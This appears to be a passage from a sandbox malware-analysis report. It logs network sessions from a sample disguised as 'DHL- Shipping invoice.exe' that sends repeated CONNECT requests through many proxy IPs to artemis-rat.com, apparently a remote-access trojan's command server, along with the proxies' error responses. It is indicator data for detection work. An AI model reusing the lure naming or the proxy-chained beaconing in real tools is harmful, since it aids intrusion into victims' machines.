                            302192.168.2.451125159.223.166.21474606484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.092912912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.390368938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.702871084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.359380960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.563329935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            303192.168.2.45018037.187.77.58218616484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.094523907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.231934071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250555038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.252509117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.343684912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:36.442445993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            304192.168.2.450185160.153.245.187317456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.094582081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            305192.168.2.451152172.67.127.188806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.094837904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.185597897 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            306192.168.2.450010208.109.14.49309936484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.100519896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.231934071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250555038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.252509117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.343648911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:36.442445993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:48.452900887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:12.452908993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:00.531529903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            307192.168.2.45104298.178.72.21109196484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.102025032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            308192.168.2.450885223.19.111.185806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.102452993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.781019926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.750691891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.750189066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.562764883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.359559059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.250104904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:22.859265089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:30.929054022 CET340INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.2
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            309192.168.2.45106672.210.221.22341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.107470036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            310192.168.2.45088620.24.43.21481236484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.118985891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.451931000 CET319INHTTP/1.1 403 Forbidden
                            Server: squid
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 17
                            X-Squid-Error: ERR_ACCESS_DENIED 0
                            X-Cache: MISS from cdn-fintech.info
                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                            Connection: keep-alive
                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                            Data Ascii: ERR_ACCESS_DENIED


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            311192.168.2.4510465.252.23.24910806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.119517088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.593483925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            312192.168.2.45116238.162.9.7931286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.120840073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.418482065 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            313192.168.2.45104345.138.87.23810806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.128535986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            314192.168.2.450939218.255.187.60806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.134685993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.795212984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.750354052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.641136885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453532934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.250127077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.047182083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:22.750256062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:37.952964067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:48.683048010 CET536INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:48 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 613
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
                            Mar 12, 2024 08:37:48.683135986 CET269INData Raw: 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f
                            Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            315192.168.2.4509318.146.206.21580906484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.135555983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.468425035 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            316192.168.2.45116638.162.8.21231286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.135855913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.434134007 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            317192.168.2.45111668.1.210.16341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.138791084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            318192.168.2.4510445.10.249.15910806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.139229059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
